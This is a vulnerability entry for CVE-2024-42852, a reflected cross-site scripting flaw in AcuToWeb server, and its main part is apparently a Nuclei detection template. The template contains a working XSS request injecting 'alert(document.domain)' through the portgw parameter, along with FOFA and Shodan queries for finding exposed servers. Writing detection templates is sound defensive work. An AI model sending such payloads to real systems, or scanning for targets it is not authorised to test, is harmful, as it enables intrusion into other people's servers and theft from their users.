漏洞描述
AcuToWeb server/10.5.0.7577c8b is vulnerable to reflected cross-site scripting (XSS) via the portgw parameter. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
CVE-2024-42852: AcuToWeb server/10.5.0.7577c8b - Cross-Site Scripting
PoC代码[已公开]
id: CVE-2024-42852
info:
name: AcuToWeb server/10.5.0.7577c8b - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
AcuToWeb server/10.5.0.7577c8b is vulnerable to reflected cross-site scripting (XSS) via the portgw parameter. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
impact: |
Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities.
remediation: |
Update AcuToWeb to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the portgw parameter.
reference:
- https://github.com/Hebing123/cve/issues/64
- https://nvd.nist.gov/vuln/detail/CVE-2024-42852
classification:
epss-score: 0.0299
epss-percentile: 0.86051
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-42852
cwe-id: CWE-79
cpe: cpe:2.3:a:opentext:acutoweb:10.5.0.7577c8b:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: opentext
product: acutoweb
fofa-query: title="AcuToWeb"
shodan-query: title:"AcuToWeb"
tags: cve,cve2024,xss,acutoweb,opentext,vkev
http:
- method: GET
path:
- "{{BaseURL}}/?portgw=80089948;%20alert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "80089948; alert(document.domain);"
- "WT_GW_PORT"
condition: and
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4a0a00473045022070505dbdfca0b8afc917e66b7c733e1a8aba97aaec9174cd7d553d0c7ca7b31b022100e6a272f7bb97a6268b98e788a7411f80e39342090cef4f219f9032dc16bb288d:922c64590222798bb761d5b6d8e72950